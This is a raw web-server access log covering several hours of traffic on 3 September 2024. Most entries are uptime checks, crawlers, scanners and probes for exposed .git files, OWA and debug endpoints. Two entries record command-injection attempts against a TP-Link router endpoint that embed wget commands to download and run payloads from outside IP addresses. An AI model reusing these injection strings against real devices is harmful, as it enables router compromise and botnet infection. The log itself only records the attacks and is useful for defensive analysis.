212.95.49.158 - - [03/Sep/2024:18:23:03 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:18:23:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:18:24:20 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.ener.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:18:24:21 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
93.174.93.12 - - [03/Sep/2024:18:25:11 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Linux; Android 9; Redmi Note 5 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
205.210.31.232 - - [03/Sep/2024:18:25:22 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:18:25:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [03/Sep/2024:18:25:40 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
213.32.39.45 - - [03/Sep/2024:18:26:12 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
195.56.55.225 - - [03/Sep/2024:18:27:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:18:29:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
141.98.11.173 - - [03/Sep/2024:18:30:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:18:31:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:18:33:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
23.22.35.162 - - [03/Sep/2024:18:35:42 +0200] "GET /ovis/kozepsocsoport.htm HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
195.56.55.225 - - [03/Sep/2024:18:35:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
5.196.102.68 - - [03/Sep/2024:18:36:11 +0200] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
18.202.32.32 - - [03/Sep/2024:18:36:39 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
195.56.55.225 - - [03/Sep/2024:18:37:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:18:39:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:18:42:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
207.46.13.229 - - [03/Sep/2024:18:42:42 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.111 - - [03/Sep/2024:18:42:53 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
91.233.21.70 - - [03/Sep/2024:18:43:34 +0200] "GET /.well-known/acme-challenge/CEIDUOEJUM0PRE7XAUAWKQEWRM73HO62 HTTP/1.1" 404 335 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:18:43:34 +0200] "GET /.well-known/acme-challenge/JDH4D9DS1DZOTTJGT15IB_9P72TM2O5I HTTP/1.1" 404 337 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:18:43:34 +0200] "GET /.well-known/acme-challenge/55T7BJMC7YE-OKDJMZ9QPIMC_F7W_SHW HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:18:43:34 +0200] "GET /.well-known/acme-challenge/PCJ4D89K36Z-ULZ0VJ62VGF3RPZ-17HI HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:18:43:35 +0200] "GET /.well-known/acme-challenge/Y7_5G2K9HU-6YABPY3PACV8PQNG_0EYT HTTP/1.1" 404 341 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:18:43:35 +0200] "GET /.well-known/acme-challenge/_3ITR4-WOKW_RIV420SZUO7HW2V3HHLW HTTP/1.1" 404 342 "-" "Cpanel-HTTP-Client/1.0"
195.56.55.225 - - [03/Sep/2024:18:44:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:18:46:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
3.101.230.171 - - [03/Sep/2024:18:46:18 +0200] "HEAD / HTTP/1.1" 200 0 "-" "bitdiscovery"
185.191.126.213 - - [03/Sep/2024:18:47:05 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
185.15.56.22 - - [03/Sep/2024:18:47:57 +0200] "HEAD /cikk.php3?id_article=819 HTTP/1.1" 404 0 "-" "IABot/2.0 (+https://meta.wikimedia.org/wiki/InternetArchiveBot/FAQ_for_sysadmins) (Checking if link from Wikipedia is broken and needs removal)"
195.56.55.225 - - [03/Sep/2024:18:48:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.102.8.77 - - [03/Sep/2024:18:48:13 +0200] "GET / HTTP/1.1" 200 1155 "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)"
185.15.56.22 - - [03/Sep/2024:18:48:17 +0200] "GET /cikk.php3?id_article=819 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
40.118.214.5 - - [03/Sep/2024:18:48:50 +0200] "GET /hudson HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x"
40.118.214.5 - - [03/Sep/2024:18:49:20 +0200] "GET /hudson HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x"
195.56.55.225 - - [03/Sep/2024:18:50:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:18:51:00 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.suni.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:18:51:00 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:18:52:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
217.65.125.204 - - [03/Sep/2024:18:53:42 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [03/Sep/2024:18:54:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
52.70.240.171 - - [03/Sep/2024:18:55:02 +0200] "GET /pgt/ HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
52.70.240.171 - - [03/Sep/2024:18:55:29 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
52.70.240.171 - - [03/Sep/2024:18:55:30 +0200] "GET /cikk.php3?id_article=420 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
195.56.55.225 - - [03/Sep/2024:18:56:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
52.70.240.171 - - [03/Sep/2024:18:57:02 +0200] "GET /ovis/nozone.htm HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
195.56.55.225 - - [03/Sep/2024:18:58:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:19:00:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
83.97.73.245 - - [03/Sep/2024:19:00:37 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.191.126.213 - - [03/Sep/2024:19:01:59 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
23.22.35.162 - - [03/Sep/2024:19:02:18 +0200] "GET /ovis/nozone.html HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
195.56.55.225 - - [03/Sep/2024:19:02:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:19:03:49 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.goncol.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:19:03:49 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:19:04:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:19:04:56 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:19:04:57 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:19:06:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.147.124.43 - - [03/Sep/2024:19:08:17 +0200] "GET /.git/config HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
195.56.55.225 - - [03/Sep/2024:19:08:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.147.124.43 - - [03/Sep/2024:19:09:36 +0200] "GET /.git/config HTTP/1.1" 404 287 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5"
195.56.55.225 - - [03/Sep/2024:19:10:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:19:12:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:19:14:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
3.224.220.101 - - [03/Sep/2024:19:16:38 +0200] "GET /cikk.php3?id_article=486 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
195.56.55.225 - - [03/Sep/2024:19:16:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:19:16:58 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.okosz.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:19:16:58 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:19:18:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
95.214.55.138 - - [03/Sep/2024:19:19:00 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
173.252.83.47 - - [03/Sep/2024:19:21:03 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
195.56.55.225 - - [03/Sep/2024:19:21:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.84 - - [03/Sep/2024:19:23:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:19:23:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
83.97.73.245 - - [03/Sep/2024:19:25:05 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.56.55.225 - - [03/Sep/2024:19:25:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
93.174.93.12 - - [03/Sep/2024:19:26:41 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Linux; Android 9; Redmi Note 5 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
195.56.55.225 - - [03/Sep/2024:19:27:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:19:29:20 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
51.222.253.3 - - [03/Sep/2024:19:29:30 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.246 - - [03/Sep/2024:19:29:31 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
18.201.180.193 - - [03/Sep/2024:19:30:35 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
185.224.128.47 - - [03/Sep/2024:19:30:55 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
3.255.254.90 - - [03/Sep/2024:19:31:16 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
195.56.55.225 - - [03/Sep/2024:19:31:23 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
147.185.132.42 - - [03/Sep/2024:19:31:47 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:19:33:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:19:35:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.235 - - [03/Sep/2024:19:36:21 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:19:37:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [03/Sep/2024:19:37:51 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
94.156.68.162 - - [03/Sep/2024:19:38:21 +0200] "GET /.git/index HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-J737A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
212.95.49.158 - - [03/Sep/2024:19:39:05 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.levego.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:19:39:05 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:19:39:08 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:19:39:08 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:19:39:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:19:41:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.156.68.162 - - [03/Sep/2024:19:42:07 +0200] "GET /.git/index HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0"
185.224.128.47 - - [03/Sep/2024:19:43:20 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
195.56.55.225 - - [03/Sep/2024:19:43:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
34.248.185.97 - - [03/Sep/2024:19:45:23 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
195.56.55.225 - - [03/Sep/2024:19:45:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
141.255.160.234 - - [03/Sep/2024:19:46:51 +0200] "POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+tplink%3B+wget+http%3A%2F%2F45.202.35.36%2Ftplink%3B+chmod+777+tplink%3B+.%2Ftplink%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:19:47:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
52.226.2.118 - - [03/Sep/2024:19:49:41 +0200] "MGLNDD_195.56.55.225_80" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:19:49:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
52.226.2.118 - - [03/Sep/2024:19:50:15 +0200] "MGLNDD_195.56.55.226_80" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:19:51:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
3.224.220.101 - - [03/Sep/2024:19:53:54 +0200] "GET /maxigas/pick/text.html HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
195.56.55.225 - - [03/Sep/2024:19:54:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:19:56:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:19:58:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:20:00:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:20:02:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:20:04:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
95.214.55.138 - - [03/Sep/2024:20:05:13 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.71.110.14 - - [03/Sep/2024:20:05:23 +0200] "" 501 - "-" "-"
167.71.110.14 - - [03/Sep/2024:20:05:32 +0200] "" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:20:06:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [03/Sep/2024:20:06:32 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.191.126.213 - - [03/Sep/2024:20:07:20 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:20:08:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.65 - - [03/Sep/2024:20:08:27 +0200] "GET / HTTP/1.0" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.95.49.158 - - [03/Sep/2024:20:08:33 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mcs.zpok.hu/owa/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:20:08:33 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mcse.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:20:08:33 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:20:08:34 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:20:10:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
31.46.253.91 - - [03/Sep/2024:20:11:44 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [03/Sep/2024:20:12:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:20:14:29 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:20:14:30 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:20:14:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
83.97.73.245 - - [03/Sep/2024:20:14:36 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
3.252.210.249 - - [03/Sep/2024:20:16:33 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
195.56.55.225 - - [03/Sep/2024:20:16:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
83.97.73.245 - - [03/Sep/2024:20:18:15 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.56.55.225 - - [03/Sep/2024:20:18:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:20:20:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:20:22:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:20:24:19 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.nane.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:20:24:19 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:20:24:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:20:26:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [03/Sep/2024:20:27:25 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
45.156.129.52 - - [03/Sep/2024:20:27:46 +0200] "GET /images/logo.blu.png HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
